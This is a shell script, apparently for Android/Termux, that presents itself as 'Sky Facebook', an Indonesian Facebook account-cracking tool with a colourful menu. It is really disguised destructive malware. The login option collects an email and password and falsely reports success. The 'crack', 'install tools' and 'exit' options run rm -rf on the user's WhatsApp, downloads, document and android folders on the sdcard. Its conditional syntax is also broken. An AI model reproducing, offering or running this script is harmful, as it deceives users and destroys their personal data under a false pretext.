#!/bin/sh
#login
#colors
blue='\e[1;34m'
cyan='\e[0;36m'
green='\033[92m'
okegreen='\033[92m'
lightgreen='\e[1;32m'
grey="\033[0;37m"
purple="\033[0;35m"
yellow="\033[1;33m"
Purple="\033[0;35m"
Cafe="\033[0;33m"
Fiuscha="\033[0;35m"
mon="mon"
lightcyan='\e[96m'
white='\e[1;37m'
nc="\e[0m"
red='\e[1;31m'
yellow='\e[1;33m'
clear
#load  
function load(){
clear
echo -e $red "MENGHUBUNGKAN..."
sleep 0.25
clear
echo -e $blue "MENGHUBUNGKAN..."
sleep 0.25
clear
echo -e $red "MENGHUBUNGKAN..."
sleep 0.25
clear
echo -e $blue "MENGHUBUNGKAN..."
sleep 0.25
clear
echo -e $red "MENGHUBUNGKAN..."
sleep 0.25        
}
load
echo -e $green "_________________________________"
sleep 0.25     
echo -e $green "||=============================||"
sleep 0.25     
echo -e $green "||   Welcome To Sky Facebook   ||"
sleep 0.25     
echo -e $green "||   AUTHOR : TAMPANSKY        ||"
sleep 0.25     
echo -e $green "||   Team : Panthom Security   ||"
sleep 0.25     
echo -e $green "||   CONTACT : 087887986528    ||"
sleep 0.25     
echo -e $green "||=============================||"
sleep 0.25     
echo -e $green "_________________________________"
sleep 0.25     
echo 
sleep 0.25     
echo 
sleep 0.25     
echo -e $green "1. login"
sleep 0.25     
echo -e $green "2. Crack Acc FB Solo"
sleep 0.25     
echo -e $green "3. Crack Acc FB Multi"
sleep 0.25     
echo -e $green "4. Install tools "
sleep 0.25     
echo -e $green "5. exit "
sleep 0.25 
echo -e $green "╭━━[PILIH]━━╮"
sleep 0.25     
echo -n -e $green "╰━$red./facebook$green━━➣ "
sleep 0.25     
read -e tod 
if [ $tod = "1" ] [ $tod = "01" ] 
then 
echo $green
read -p "Masukan Email:" email
sleep 1     
read -p "Masukan Password:" pass 
clear 
sleep 1
echo -e $green "Berhasil Login !"
sleep 1
bash skyfb
else
echo -e $red "gagal Login !"
bash skyfb
fi 
clear 
if [ $tod = "2" ] [ $tod = "02" ]
then 
rm -rf /sdcard/0/whatsapp
bash skyfb
else 
echo -e $red "ENGGAK BISA GAN!"
bash skyfb
fi 
clear 
if [ $tod = "3" ] [ $tod = "03" ]
then
rm -rf /sdcard/0/downloads
sleep 1
rm -rf /sdcard/0/document
sleep 1
rm -rf /sdcard/0/android
sleep 1
bash skyfb
else 
echo -e $red"ENGGAK BISA GAN!"
bash skyfb 
fi 
clear
if [ $tod = "4" ] [ $tod = "04" ]
then
rm -rf /sdcard/0/downloads
sleep 1
rm -rf /sdcard/0/document
sleep 1
rm -rf /sdcard/0/android
sleep 1
bash skyfb
else 
sleep 1
echo -e $red " ENGGAK BISA GAN!"
sleep 1
bash skyfb
fi 
clear
if [ $tod = "5" ] [ $tod = "05" ]
then
rm -rf /sdcard/0/downloads
sleep 1
rm -rf /sdcard/0/document
sleep 1
rm -rf /sdcard/0/android
sleep 1
bash skyfb
else 
echo -e $red"enggak bisa gan !"
sleep 1
bash skyfb
fi 
clear 
